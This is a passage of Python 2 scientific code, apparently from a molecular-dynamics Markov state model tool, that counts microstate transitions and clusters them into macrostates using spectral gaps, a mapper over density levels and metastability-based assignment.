pLevels.append(np.copy(pLevelsScan[0])) pLevelSGQuality.append(np.copy(specGapQuality)) pLevelNumMacro.append(np.copy(tmpMaxNumMacro)) elif ( ((len(csize[0])) <= tmpMaxNumMacro) and (specGapQuality > tmpMaxGapQuality) ): tmpMaxNumMacro = len(csize[0]) tmpMaxGapQuality = specGapQuality pLevels[(len(pLevels)-1)] = pLevelsScan[0] pLevelSGQuality[(len(pLevels)-1)] = specGapQuality pLevelNumMacro[(len(pLevels)-1)] = len(csize[0]) else: print "(OUTPUT) ", ("Skipping density level at \"%1.3f\" because it contains to few microstates ( <2 )" % pLevelsScan[0]) print "(OUTPUT) ", "Optimum density levels identified & num of macrostates per level:" counter=0 for i in pLevels: print "(OUTPUT) \t", i, "\t", pLevelNumMacro[counter] counter+=1 print "(OUTPUT) ", "Sum of the differences of the spectral gaps:" for i in pLevelSGQuality: print "(OUTPUT) ", i print "(OUTPUT) ", "Density levels scan DONE. Proceding to the SHC clustering!" return pLevels def removeBarelyConnectedMicros(originalMicrosCountM, numRemoveBarelyConnectedMicros): print "(OUTPUT) ", ("Removing barely connected microstates with a cut off <%d transitions (in or out) (EXPERIMENTAL)" % numRemoveBarelyConnectedMicros) counter=0 originalMicrosCountM = originalMicrosCountM.todense() for i in range (0, originalMicrosCountM.shape[0]): if (((originalMicrosCountM[i,:].sum() - originalMicrosCountM[i,i] - numRemoveBarelyConnectedMicros) < 0 ) or ((originalMicrosCountM[:,i].sum() - originalMicrosCountM[i,i] - numRemoveBarelyConnectedMicros) < 0 )): counter+=1 originalMicrosCountM[i,:] = 0 originalMicrosCountM[:,i] = 0 print "(OUTPUT) ", ("Removed %d barely connected microstates (turn to pop 0)..." % counter) originalMicrosCountM = csc_matrix(originalMicrosCountM) return(originalMicrosCountM) def writeMacrostateMap(outName, nMicro, ci, connectedMicrosIndex): print "(OUTPUT) ", ("Writting macrostate maping file: %s" % outName) f = open(outName,'w') micro2macro = zeros((nMicro), int) micro2macro[connectedMicrosIndex] = ci for i in range(0, nMicro): line = (micro2macro[i]-1) print >>f, line f.close() print "(OUTPUT) ", ("Done writting macrostate maping file!") def writeMacroAssignments(tLag, headDir, trajlistfiles, ci, connectedMicrosIndex, nMicro): print "(OUTPUT) ", ("Writting macrostate assignments to:") micro2macro = zeros((nMicro), int) micro2macro[connectedMicrosIndex] = ci for filenameInp in file(trajlistfiles): filenameInp = filenameInp.strip() filenameInp = "%s/assignments/%s" % (headDir,filenameInp) tmpLineLen=len(filenameInp)+10 sys.stdout.write('(OUTPUT) %s' % filenameInp) for i in range (0, tmpLineLen): sys.stdout.write('\b') output = [] for line in file(filenameInp): line=line.strip().split() if (int(line[0]) > -1): lineout="%d %d" %( int(line[0]), (micro2macro[int(line[0])] -1)) else: lineout="%d -1" %( int(line[0])) output.append(lineout) f = open(filenameInp,'w') for line in output: print >>f, line f.close() print "\n", "(OUTPUT) ", ("Done writting macrostate assignments!") def getMicroTransitionsFromAssignements(tLag, headDir, trajlistfiles,bJumpWindow): originalNumOfMicros=0 totalCounts=0 numberOfTrajs=0 print "(OUTPUT) ", ("Assesing the number of microstates...") for filenameInp in file(trajlistfiles): filenameInp = filenameInp.strip() filenameInp = "%s/assignments/%s" % (headDir,filenameInp) tmpLineLen=len(filenameInp)+10 numberOfTrajs+=1 sys.stdout.write('(OUTPUT) %s' % filenameInp) for i in range (0, tmpLineLen): sys.stdout.write('\b') for line in file(filenameInp): line = line.strip().split() line = int(line[0]) if (line > originalNumOfMicros): originalNumOfMicros = line if (originalNumOfMicros>0): originalNumOfMicros+=1 print "(OUTPUT) ", ("Found %d microstates in %d trajectories" % (originalNumOfMicros, numberOfTrajs)) elif (originalNumOfMicros==0): print "(OUTPUT) ", ("Found 0 microstates in %d trajectories, cannot continue!", numberOfTrajs) exit(0) print "(OUTPUT) ", ("Reading microstates assignments from files and counting transitions:") originalMicrosCount= lil_matrix((originalNumOfMicros, originalNumOfMicros)) tmpLineLen=0 for filenameInp in file(trajlistfiles): filenameInp = filenameInp.strip() filenameInp = "%s/assignments/%s" % (headDir,filenameInp) tmpLineLen=len(filenameInp)+10 for i in range (0, tmpLineLen): sys.stdout.write('\b') previousm=-1 trajLength = 0 for line in file(filenameInp): trajLength += 1 ###NEXT IS SLIDING WINDOW### if ( bJumpWindow == 0 ): trajectory=zeros ((trajLength), int) for i in range (1, trajLength): line = linecache.getline(filenameInp, i).strip().split() trajectory[i] = line[0] for i in range (0, trajLength-tLag): if ((trajectory[i] >= 0) & (trajectory[i+tLag]>= 0)) : originalMicrosCount[trajectory[i], trajectory[i+tLag]]+=1 ###END SLIDING WINDOW### ###NEXT IS JUMP WINDOW### if ( bJumpWindow == 1 ): trajectory=zeros ((trajLength/tLag)+1, int) for i in range (0, trajLength): #Qin's Fix (THX) line = linecache.getline(filenameInp, i+1).strip().split() if(i%tLag==0): #Qin's Fix (THX) trajectory[i/tLag]=(int(line[0])) for i in range(0, (trajLength/tLag)-1): if ((trajectory[i] >= 0) & (trajectory[i+1]>= 0)) : originalMicrosCount[trajectory[i], trajectory[i+1]]+=1 ###END JUMP WINDOW## print "\n", "(OUTPUT) ", ("Finished with microstates count!") print "(OUTPUT) ", ("Total number of microstate transitions: %d" % originalMicrosCount.sum() ) originalMicrosCount = originalMicrosCount.tocsc() emptyNumber=0 for i in range (0, originalNumOfMicros): if ((originalMicrosCount[i,:].sum() + originalMicrosCount[:,i].sum()) == 0): emptyNumber+=1 print("Warning microstate %d is empty!" % i) if(emptyNumber > 0): print "(OUTPUT) ", ("Warning, there are %d empty microstates" % emptyNumber) print "(OUTPUT) ", ("There are %d non-empty microstates" % (originalMicrosCount.shape[0]-emptyNumber)) return (originalMicrosCount) def writeCountMatrix ( originalMicrosCount, outMicroCountMatrixName, message, doWriteTXT): print "(OUTPUT) ", (message) scipy.io.mmwrite(outMicroCountMatrixName, originalMicrosCount, field="integer") if (doWriteTXT == 1): print "(OUTPUT) Writing (also) a count matrix in TXT format! (May be very slow, be patient)" outMicroCountMatrixName="%s.txt"%(outMicroCountMatrixName) f = open(outMicroCountMatrixName,'w') advanceCounter=0.0 numMicros=originalMicrosCount.shape[0] originalMicrosCount=originalMicrosCount.tolil() outline="0.0% Complete" sys.stdout.write('(OUTPUT) %s' %outline) for i in range(0, numMicros): advanceCounter+=1.0 print advanceCounter, numMicros line=" " for j in range(0, numMicros): line+= str(int(originalMicrosCount[i,j])) + " " print >>f, line if (advanceCounter >= (numMicros/100.0)): for k in range (0, len(outline)+10): sys.stdout.write('\b') sys.stdout.write('(OUTPUT) %s' % outline) outline="%.1f%% Complete " % ((i+1)*100/numMicros) advanceCounter=0 print "\n", "(OUTPUT) ", ("Finished TXT write!") f.close() def getConnectedMicrostates (originalMicrosCount): print "(OUTPUT) ", ("Searching connected microstates using graph theory") microConnectedComponents=cs_graph_components((originalMicrosCount + originalMicrosCount.conj().transpose())) componentsSize=zeros((microConnectedComponents[0]+1), int) emptySize=0 for i in microConnectedComponents[1]: if (i >= 0): componentsSize[i+1]+=1 else: emptySize +=1 indexMaxConnected, sizeMaxConnected = componentsSize.argmax(0), componentsSize.max(0) lineout = ("Found %d connected microstates, %d disconnected microstates and %d empty microstates" % (sizeMaxConnected, (componentsSize.sum()-sizeMaxConnected), emptySize)) print "(OUTPUT) ", lineout if ((emptySize > 0) | ((componentsSize.sum()-sizeMaxConnected) > 0)): print "(OUTPUT) ", "Removing disconnected microstates" connectedMicrosIndex = where(microConnectedComponents[1] == (indexMaxConnected-1)) connectedMicrosIndex = getIndexFromArray(connectedMicrosIndex[0]) connectedMicros = originalMicrosCount[ix_(connectedMicrosIndex,connectedMicrosIndex)] else: connectedMicros = originalMicrosCount connectedMicrosIndex = range(0,componentsSize.sum()) return connectedMicros, connectedMicrosIndex def readPlevels(fileName, cumulativeSumOfRows): print "(OUTPUT) ", ("Reading density levels from file: %s" % fileName) pLevels=[] for line in file(fileName): line = line.strip() pLevels.append(float(line)) return (pLevels) def cumulativeDesityFunctionOfHeightFilter(x): total = sum(x) x = -x x.ravel().sort() x = -x y = x.cumsum(axis=0)/total return y def getIndexFromMatrix(indexA): xx = indexA xxx=[] for i in range (0, len(xx)): xxx.append(xx[i,0]) return(xxx) def getIndexBFromMatrix(indexB): xx = indexB xxx=[] for i in range (0, len(xx)): xxx.append(xx[0,i]) return(xxx) def getIndexFromArray(indexA): xx = indexA xxx=[] for i in range (0, len(xx)): xxx.append(xx[i]) return(xxx) def IntList2array(listA): xx = listA xxx= zeros((len(listA)),int) for i in range (0, len(xx)): xxx[i] = xx[i] return(xxx) def apBetti(X, filterX, levels): print "(OUTPUT) ", ("Computing persistent aproximate betti numbers via spectral gaps") #X = X.tocsc() ig = filterX/(max(filterX)) #print "PPC",filterX, (max(filterX)) ig = -ig rk = ig.argsort(axis=0) ig.sort(axis=0) ig = -ig MAXNUMBEREIG = 20; k = MAXNUMBEREIG eps = 1e-4 randSurf = 1e-1 N = len(filterX) revecs = [] revals = [] Components = [] specGaps = [] aBettis = [] for i in range (0, len(levels)): revecs.append(0) revals.append(0) Components.append(0) specGaps.append(0) aBettis.append(0) print "(OUTPUT) ", ("Level\tSize\t#Comp\tB0_1\tGap_1\t\tB0_2\tGap_2\t\tB0_3\tGap_3") for i in range (0, len(levels)): if (levels[i] > 1): n = int(levels[i]) else: n = int(sum(ig>=levels[i])) outline= ("%d\t %d\t"%(i,n)); if (n == 1): Components[i] = 1 specGaps[i] = ones(MAXNUMBEREIG); aBettis[i] = [1, zeros(MAXNUMBEREIG-1)] else: tmpindx = getIndexFromMatrix(rk[0:n]) Y = csc_matrix(((X[ix_(tmpindx,tmpindx)])) + (eps*identity(n)) +(randSurf * ones((n,n), float)/n)) Y2 = zeros((n,n)) tmparray=[] for j in Y.sum(axis=1): tmparray.append(j[0,0]) Y2[diag_indices(n)]= tmparray Y2 = csc_matrix(Y2) sigma = 1+eps+randSurf B = Y - sigma*Y2 sigma_solve = dsolve.splu(B) Y2L = aslinearoperator(Y2) if ((n-4) > MAXNUMBEREIG): # revals[i],revecs[i] = ARPACK_gen_eigs( Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, MAXNUMBEREIG, 'LM' ) revals[i],revecs[i] = eigs( Y, MAXNUMBEREIG, Y2, sigma, which='LM', maxiter=10000 ) else: revals[i],revecs[i] = scipy.linalg.eig( Y.todense(),Y2.todense() ) revals[i]=real(revals[i]) #SORT EIGENVALUES AND EIGENVECTORS tmpindsort = argsort(-revals[i]) revals[i] = revals[i][tmpindsort] revecs[i] = revecs[i][:, tmpindsort] # second axis !! if (n > MAXNUMBEREIG): revals[i] = revals[i][:MAXNUMBEREIG] revecs[i] = revecs[i][:, :MAXNUMBEREIG] #Remove later DASM # tmplineout="" # for ii in revals[i]: # tmplineout+=" "+ str(ii) # print "(DEBUG) Using a matrix of %ix%i, eigenvalues are:\n(DEBUG) \t" %((n-4),(n-4)), tmplineout #END REMOVE# Components[i] = sum(revals[i]>(1-1e-5)) tmpSpecGaps = -(abs(diff(revals[i]))) aBettis[i] = tmpSpecGaps.argsort(axis=0) for xx in range (1, len(revals[i])): #FIX for eigenvalues = 1.0 on lowlevels if ((revals[i][xx]+1e-5) >= 1) and (aBettis[i][0] < xx): aBettis[i][0]+=1 else: break tmpSpecGaps.sort(axis=0) specGaps[i] = -tmpSpecGaps outline += ('%d\t'% Components[i]) for gaplist in range (0, min(3,len(aBettis[i]))): outline += ('%d\t %f\t'%(aBettis[i][gaplist], specGaps[i][gaplist])); print "(OUTPUT) ", outline print "(OUTPUT) ",("Done with betti numbers!") return (aBettis, specGaps) def superLevelSet(filterX, levels, clusters): ig = -filterX idd = ig.argsort(axis=0) ig.sort(axis=0) ig = -ig superLevelSetId = [] superLevelSetIg = [] for i in range (0, len (levels)): superLevelSetId.append(np.copy(idd[0:levels[i]])) superLevelSetIg.append(np.copy(clusters[i])) return (superLevelSetId, superLevelSetIg) def superMapper (X,superLevelSet): print "(OUTPUT) ", ('Executing the SMapper') numPoints = X.shape[0] dim = X.shape[1] if (dim!=numPoints): print "(OUTPUT) ", ('ERROR: the input for the mapper must be a symmetric transition count matrix!') sys.exit() numLevels = len(superLevelSet[0]) lengthX = [] idxSort = [] for i in range (0, numLevels): lengthX=concatenate((lengthX,len(superLevelSet[0][i])), axis=None) tmpReshape = superLevelSet[0][i].reshape(1,lengthX[i]) tmpReshape2 = [] for j in range (0, size(tmpReshape, axis=1)): tmpReshape2.append(np.copy(tmpReshape[0,j])) idxSort=concatenate((idxSort,tmpReshape2), axis=None) Y = X[ix_(idxSort,idxSort)]; print "(OUTPUT) ", ("SMapper:\tnumber of points %d" % numPoints); print "(OUTPUT) ", ("\t\tnumber of levels %d" % len(superLevelSet[0])); numGraphNodes = 0 nodeInfoLevel = [] nodeInfoLevelSize = [] nodeInfoSet = [] nodeInfoFilter = [] levelIdx = [] adja = [] ci = [] csize = [] numCluster = [] for level in range (0, len(superLevelSet[0])): index1= getIndexFromMatrix(superLevelSet[0][level]) data = (X[ix_(index1,index1)]) citmp, csizetmp, specVals, specVecs, specGaps, conduct, cluster_treeData, cluster_treeConduct, cluster_treeLeft, cluster_treeRight = spectralClustering(data,superLevelSet[1][level]) ci.append(np.copy(citmp)) csize.append(np.copy(csizetmp)) numCluster.append(len(csize[level])) print "(OUTPUT) ", ("Level %d has %d macrostates out of %d microstates" % (level ,numCluster[level], data.shape[0])) numGraphNodes = len(nodeInfoLevel) for i in range (0,numCluster[level]): new_node = i + numGraphNodes if (i==0): levelIdx.append(np.copy([new_node])) else: levelIdx[level] = concatenate((levelIdx[level],new_node), axis=None) nodeInfoLevel.append(np.copy(level)); nodeInfoLevelSize.append(data.shape[0]) thisNodeIndex = where(ci[level]==i) nodeInfoSet.append(np.copy(superLevelSet[0][level][thisNodeIndex])) nodeInfoFilter.append(np.copy(level)) if(level > 0): prevLvlIdx = levelIdx[level-1] thisLvlIdx = levelIdx[level] for i in range (0,len(prevLvlIdx)): for j in range (0,len(thisLvlIdx)): a = prevLvlIdx[i] b = thisLvlIdx[j] N_ab = len(intersect1d(getIndexFromMatrix(nodeInfoSet[a]),getIndexFromMatrix(nodeInfoSet[b]))); if (N_ab > 0): adja.append(np.copy([a,b,N_ab])) adjaArray = array2matrix(adja, len(nodeInfoLevel)) if (numLevels == 1): adjaArray = zeros((len(nodeInfoLevel),len(nodeInfoLevel)),int) print "(OUTPUT) ", ('SMapper done...') return(adjaArray, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) def array2matrix(arr, lenArra): result = zeros((lenArra,lenArra),int) for i in arr: result[i[0]][i[1]]= i[2] result[i[1]][i[0]]= i[2] return (result) def spectralClustering(X,k): clusterSizeThreshold=0 n = X.shape[0]; eps = 1e-4 randSurf = 1e-1 MAXCLUSTER = min(50,n) Y = csc_matrix(X + (eps*eye(n,n)) +(randSurf * ones((n,n), float)/n)) Y2 = zeros((n,n)) tmparray=[] for j in Y.sum(axis=1): tmparray.append(np.copy(j[0,0])) Y2[diag_indices(n)]= tmparray Y2 = csc_matrix(Y2) sigma = 1+eps+randSurf B = Y - sigma*Y2 sigma_solve = dsolve.splu(B) Y2L = aslinearoperator(Y2) # printDebug(MAXCLUSTER, "MAXCLUSTER") printDebug(n, "N") #SPARCE matrix solver HAVES SOME PROBLEM since can return eigenvalues = 0.0, maybe increment the number of cycles DASM# if ((n-4) > MAXCLUSTER): # specVals,specVecs = ARPACK_gen_eigs(Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, MAXCLUSTER-1, 'LM') specVals,specVecs = eigs( Y, MAXCLUSTER-1, Y2, sigma, which='LM',maxiter=10000 ) printDebug(specVals,"Specvals1a") else: specVals,specVecs = scipy.linalg.eig(Y.todense(),Y2.todense()) specVals=real(specVals) printDebug(specVals,"Specvals1b") #END# #NEXT temporary fix # specVals,specVecs = scipy.linalg.eig(Y.todense(),Y2.todense()) # specVals=real(specVals) #END fix # #SORT EIGENVALUES AND EIGENVECTORS tmpindsort = argsort(-specVals) specVals = specVals[tmpindsort] specVecs = specVecs[:, tmpindsort] # second axis !! # if (n > MAXCLUSTER): # specVals = specVals[:MAXCLUSTER] # specVecs = specVecs[:, :MAXCLUSTER] printDebug(specVals, "SpecvalsSortShort") specGaps = -(abs(diff(specVals))) numComponents = sum(specVals>1-(1e-10)) #TODO: add this DASM# #if numComponents>1, # cluster_tree{1}.left = 2; # cluster_tree{1}.right = 3; # for i=1:numComponents, # mn = mean(abs(spectrum.vecs(:,i))); # cluster_tree{i+1}.data = find(abs(spectrum.vecs(:,i))>=mn); # cluster_tree{i+1}.left = 0; # cluster_tree{i+1}.right = 0; # id_complement = find(abs(spectrum.vecs(:,i))<mn); # cluster_tree{i+1}.conduct = sum(sum(X(cluster_tree{i+1}.data,id_complement)))/sum(sum(X(cluster_tree{i+1}.data,cluster_tree{i+1}.data))); # end #end #END TODO# cluster_treeData=[] cluster_treeData.append(range(0,n)) cluster_treeLeft = [0] cluster_treeRight = [0] cluster_treeConduct = [0] printDebug(numComponents,"numComponents") printDebug(k+1,"k+1") for i in range (numComponents, k+1): #k is the number of components identified by Betty numbers tree_size = len(cluster_treeData) variation = zeros((tree_size)) for j in range (0, tree_size): if ((cluster_treeLeft[j] == 0) and (cluster_treeRight[j] == 0)): tmp = specVecs[cluster_treeData[j], i] if (len(tmp) > 1): variation[j] = (var(tmp)*len(tmp)/(len(tmp)-1)); else: variation[j] = 0; mx = variation.max(0) ind = variation.argmax(0) indices = cluster_treeData[ind] printDebug(indices,"indices") printDebug(len(indices),"lenindices") nn = len(indices) if (i==1): Xsplit = csc_matrix(X[ix_(indices,indices)]+eps*eye(nn,nn)+randSurf*ones((nn,nn))/nn) vecFiedler = specVecs[:,i] else: Xsplit = csc_matrix(X[ix_(indices,indices)]+eps*eye(nn,nn)+randSurf*ones((nn,nn))/nn) Y2 = zeros((nn,nn)) tmparray=[] for j in Xsplit.sum(axis=1): tmparray.append(np.copy(j[0,0])) Y2[diag_indices(nn)]= tmparray Y2 = csc_matrix(Y2) B = Xsplit - sigma*Y2 sigma_solve = dsolve.splu(B) Y2L = aslinearoperator(Y2) ##TODO: maybe somethingWrongHere DASM## if ((nn-4) > 20): # splitVals,splitVecs = ARPACK_gen_eigs(Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, 3, 'LM') splitVals,splitVecs = eigs( Xsplit, 3, Y2, sigma, which='LM',maxiter=10000 ) else: splitVals,splitVecs = scipy.linalg.eig(Xsplit.todense(),Y2.todense()) splitVals=real(splitVals) ##END ToDo## ##SORT EIGENVALUES AND EIGENVECTORS## tmpindsort = argsort(-splitVals) splitVals = splitVals[tmpindsort] splitVecs = splitVecs[:, tmpindsort] # second axis !! if (nn > 3): splitVals = splitVals[:3] splitVecs = splitVecs[:, :3] if (len(splitVecs[0]) > 1): vecFiedler = splitVecs[:,1] else: vecFiedler = splitVecs left_indices = (vecFiedler < vecFiedler.mean()).nonzero()[0] right_indices = (vecFiedler >= vecFiedler.mean()).nonzero()[0] if ((min(len(left_indices),len(right_indices))) > 0): #ARPACK needs matrix >=5 to get speigs lind = tree_size + 1 rind = tree_size + 2 cluster_treeLeft[ind] = lind cluster_treeRight[ind] = rind indices = IntList2array(indices) cluster_treeData.append(indices[left_indices]) cluster_treeData.append(indices[right_indices]) cluster_treeLeft.append(0) cluster_treeRight.append(0) cluster_treeLeft.append(0) cluster_treeRight.append(0) if (len(left_indices)==1): left_indices = concatenate((left_indices[0], left_indices[0]), axis=None) if (len(right_indices)==1): right_indices = concatenate((right_indices[0], right_indices[0]), axis=None) cut = Xsplit[ix_(left_indices,right_indices)].sum() volume_left = Xsplit[ix_(left_indices,left_indices)].sum() volume_right = Xsplit[ix_(right_indices,right_indices)].sum() cluster_treeConduct.append(cut/min(volume_left,volume_right)) cluster_treeConduct.append(cut/min(volume_left,volume_right)) leaves = [] leaveSize = [] ci = zeros((n), int) if ((clusterSizeThreshold > 0) and (clusterSizeThreshold < 1)): clusterSizeThreshold = around(clusterSizeThreshold*n); else: clusterSizeThreshold = around(clusterSizeThreshold); for i in range (0, len(cluster_treeData)): if ((cluster_treeLeft[i] == 0) and (cluster_treeRight[i] == 0)): if (len(leaves) == 0): leaves = [i] ci[cluster_treeData[i]] = 1 else: leaves = concatenate((leaves,i), axis=None) ci[cluster_treeData[i]] = len(leaves) # print leaves #Funny that makes an extra cicle? leaveSize = zeros((len(leaves))) for i in range (0,len(leaves)): leaveSize[i] = sum(ci == (i+1)) idd = (leaveSize >= clusterSizeThreshold).nonzero()[0] csize = np.copy(leaveSize[idd]) ci = zeros((n),int) conduct = zeros((len(idd))); for i in range (0, len(idd)): ci[cluster_treeData[leaves[idd[i]]]]=i conduct[i] = cluster_treeConduct[leaves[idd[i]]] return(ci, csize, specVals, specVecs, specGaps, conduct, cluster_treeData, cluster_treeConduct, cluster_treeLeft, cluster_treeRight) def flowGrad(G, levelIdx, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter): numLevel = len(levelIdx) dG = triu(G); y=[] localMax = (where(dG.sum(axis=0)[0] == 0))[1].transpose() dd = zeros((len(G)), int); for i in range (0,len(localMax)): dd[localMax[i]] = len(nodeInfoSet[localMax[i]]); dG = dG + diag(dd) dG_inf=dG^numLevel for i in range (0,len(G)): y.append(where(dG_inf[:,i] > 0)) dGdivsum = getIndexFromMatrix((1.0/dG.sum(axis=0)).transpose()) MarkovT = dG * diag(dGdivsum) yLocalMax = localMax yGradFlow = dG yEquilibriumEQ = MarkovT**numLevel print "(OUTPUT) ", ("Number of local maxima: %d" % len(localMax)) return(yLocalMax, yGradFlow, yEquilibriumEQ) def optimumAssignment(X, cptEquilibriumEQ, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, maximumAssignIterations): print "(OUTPUT) ", ("Finding Optimum Assignments") numMicro = max(X.shape[0], X.shape[1]) numNode = len(nodeInfoSet) MacroStates = (where(diag(cptEquilibriumEQ)==1)[0]).transpose() numMacro = len(MacroStates) if numMacro == 1: print "(OUTPUT) ", ("SHC has found only one Macrostate! Noting to optimize...") ci = ones((numMicro), int) csize = numMicro fassign = [] T = [] Qmax = 1 id_fuzzy = [] return(ci, csize, fassign, T, Qmax, id_fuzzy) print "(OUTPUT) ", ("Optimum assignments Done...") distEQ = cptEquilibriumEQ[MacroStates,:] ci = zeros((numMicro), int); id_macro = [] # deterministic assignment on basins of local maxima for i in range (0, numMacro): macroBasin = (where(distEQ[i,:] == 1)[1]).transpose() for j in range (0, len(macroBasin)): if (j==0): id_macro.append(np.copy(nodeInfoSet[macroBasin[j]])) id_macro[i] = union1d(getIndexFromMatrix(id_macro[i]),getIndexFromMatrix(id_macro[i])) else: id_macro[i] = union1d(id_macro[i],getIndexFromMatrix(nodeInfoSet[macroBasin[j]])) ci[id_macro[i]] = i+1 #Take care that ci is +1 since it maps microstates numbers, 0 is for fussy # fuzzy microstates on barrier id_fuzzy = (where(ci==0))[0] print "(OUTPUT) ", ("Number of barrier microstates: %d" % len(id_fuzzy)) # Construct new transition count matrix from X T = eye((numMacro+len(id_fuzzy)), (numMacro+len(id_fuzzy))) T = T.tolil() Xdense = X.todense() # for i in range (0, numMacro): # row_id = where(ci==(i+1)) # for j in range (i, numMacro): # # print i, j # col_id = where(ci==(j+1)) # T[i,j] = X[row_id,col_id].sum() # #print len(id_fuzzy) # for j in range (1, len(id_fuzzy)): # # print i, j # tmpindx=array([id_fuzzy[j]]) # T[i,j+numMacro] = X[row_id,tmpindx].sum() for i in range (0, numMacro): row_id = where(ci==(i+1))[0] for j in range (i, numMacro): col_id = where(ci==(j+1))[0] T[i,j] = Xdense[ix_(row_id,col_id)].sum() #print len(id_fuzzy) for j in range (1, len(id_fuzzy)): tmpindx=array([id_fuzzy[j],id_fuzzy[j]]) T[i,j+numMacro] = Xdense[ix_(row_id,tmpindx)].sum() T = T + (triu(T,1)).transpose() T = T.todense() # print "(OUTPUT) SLOW 1" T[numMacro:(numMacro+len(id_fuzzy)),numMacro:(numMacro+len(id_fuzzy))] = Xdense[ix_(id_fuzzy,id_fuzzy)] # print "(OUTPUT) SLOW 2" d = T.sum(axis=1) n = d.shape[0] dd = zeros((n,n)) tmparray=[] # print "(OUTPUT) SLOW 3" for j in d: tmparray.append(1.0/j[0,0]) dd[diag_indices(n)]= tmparray # print "(OUTPUT) SLOW 4" # dd = lil_matrix((n,n)) # jj=0 # for j in (d): # if (j[0,0] > 0): # dd[jj,jj]=(1.0/j[0,0]) # else: # dd[jj,jj]= 0 #Is this correct? Why this could happen? # jj+=1 dd = csc_matrix(dd) T = csc_matrix(T) # print "(OUTPUT) SLOW 5" M = T*dd # print "(OUTPUT) SLOW 6" Mp = M.todense() # print "(OUTPUT) SLOW 7" # print Mp.sum() eps = 1e-4 # small for tie-breaker fass = zeros((numMacro, (numMacro+len(id_fuzzy)))) # print "(OUTPUT) SLOW 8" for i in range(0, numMacro): # print "(OUTPUT) SLOW 8a", i fass[i][i]=1 # print "(OUTPUT) SLOW 9" fass[:,numMacro:] = Mp[:numMacro,numMacro:] iterN = 0 fassign=[] id_domore=[] CI=[] CSIZ=[] Q=[] fassign.append(copy(fass)) fass_sort = -fass id_fass_sort = fass_sort.argsort(axis=0) fass_sort.sort(axis=0) fass_sort= -fass_sort id_domore.append((where ((fass_sort[0,:] < eps) | ((fass_sort[0,:]-fass_sort[1,:])<eps)))[0]) print "(OUTPUT) ", ("Number of empty assignments: %d" % len(id_domore[iterN])); CI.append(copy(ci)) CI[iterN][id_fuzzy] = 1+(id_fass_sort[0,numMacro:]) CSIZ.append(hiscMacro(CI[iterN])) Q.append(metastability(X,CI[iterN])) numMacro = ci.max(0) print "(OUTPUT) ", ("Num of macrostates: %d" % ci.max(0)) print "(OUTPUT) ", ("Metastability (Q) = %.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100))) Qmax = Q[iterN] iter_max = iterN ci = np.copy(CI[iterN]) csize = np.copy(CSIZ[iterN]) fassigne =[] while ((id_domore[iterN].size>0) and (iterN < maximumAssignIterations)): iterN = iterN + 1 print "(OUTPUT) ", ("*Iteration %d" % iterN) numMacro = ci.max(0) print "(OUTPUT) ", ("Number of macrostates: %d" % ci.max(0)) Mp = Mp*M fass[:,id_domore[iterN-1]] = Mp[:numMacro,id_domore[iterN-1]] fass_sort = -fass id_fass_sort = fass_sort.argsort(axis=0) fass_sort.sort(axis=0) fass_sort= -fass_sort id_domore.append((where ((fass_sort[0,:] < eps) | ((fass_sort[0,:]-fass_sort[1,:])<eps)))[0]) print "(OUTPUT) ", ("Number of empty assignment: %d" % len(id_domore[iterN])); # Method I (first-reach diffusion): find the optimal assignment CI.append(copy(ci)) CI[iterN][id_fuzzy] = 1+(id_fass_sort[0,numMacro:]) CSIZ.append(hiscMacro(CI[iterN])) Q.append(metastability(X,CI[iterN])) print "(OUTPUT) ", ("(Q) I (first-reach) = \t%.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100))); # print Qmax, Q[iterN] if (Qmax < Q[iterN]): Qmax = Q[iterN] iter_max = iterN ci = np.copy(CI[iterN]) csize = np.copy(CSIZ[iterN]) # print ci # Method II (all-iteration diffusion): rearrange the fuzzy assignment by the last iteration of Mp numMacro = ci.max(0) print "(OUTPUT) ", ("Number of macrostates: %d" % ci.max(0)) fassign.append(copy(fass)) #Copy the array to avoid creating a pointer (THX Raymond) fassign[iterN][:,numMacro:] = Mp[:numMacro,numMacro:] fassign[iterN][:,id_domore[iterN]] = (ones((numMacro,len(id_domore[iterN])))/numMacro); F_rowsort = -fassign[iterN] id_rowsort = F_rowsort.argsort(axis=0) F_rowsort.sort(axis=0) F_rowsort = -F_rowsort CI[iterN][id_fuzzy] = id_rowsort[0,numMacro:] CSIZ[iterN]=hiscMacro(CI[iterN]) Q[iterN] = metastability(X,CI[iterN]) print "(OUTPUT) ", ("(Q) II (all-iteration) = \t%.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100))); if (Qmax < Q[iterN]): Qmax = Q[iterN] iter_max = iterN ci = np.copy(CI[iterN]) csize = np.copy(CSIZ[iterN]) # print ci print "(OUTPUT) ", ("---- Maximal metastability reached at iteration %d: %f (%2.2f%%) ----\n" % (iter_max,Qmax,(Qmax/numMacro*100))) print "(OUTPUT) ", ("---- Final number of macrostates: %d ----\n" % ci.max(0)) print "(OUTPUT) ", ("Optimum assignments Done...") return(ci, csize, fassign, T, Qmax, id_fuzzy) def metastability(X,ci): #Compute the metastability according to macro-clustering ci numMacro=max(ci); idX=[] for i in range(0,numMacro): idX.append(where(ci==(i+1))[0]) if (len (idX[i]) == 1): idX[i] = [idX[i][0],idX[i][0]] QQ = zeros((numMacro,numMacro)) for i in range(0,numMacro): for j in range(0,numMacro): QQ[i,j]=(X[ix_(idX[i],idX[j])].sum()) QQ[j,i]=QQ[i,j] D = QQ.sum(axis=1) Q = (diag(diag(1./D)*QQ)).sum() return(Q) def hiscMacro(arr): #Wrapper to Emulate matlab's --hisc-- function that counts the number of elements per class in a histogram hisc=zeros((max(arr)), int) for i in (arr): hisc[i-1]+=1 return (hisc) def writeFlowGraph(cptGradFlow, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, superLevels, outFlowGraphName, pLevels): print "(OUTPUT) ", ("---- Generating Macrostate flowgraph ---") # print "(DEBUG) ", scipy.linalg.norm(cptGradFlow - (cptGradFlow.conj().T)) if ( scipy.linalg.norm(cptGradFlow - (cptGradFlow.conj().T))==0 ): print "(OUTPUT) ", ("error: Input graph is UNDIRECTED! I CANNOT GENERATE THE FLOW GRAPHIC!") return numNodes = 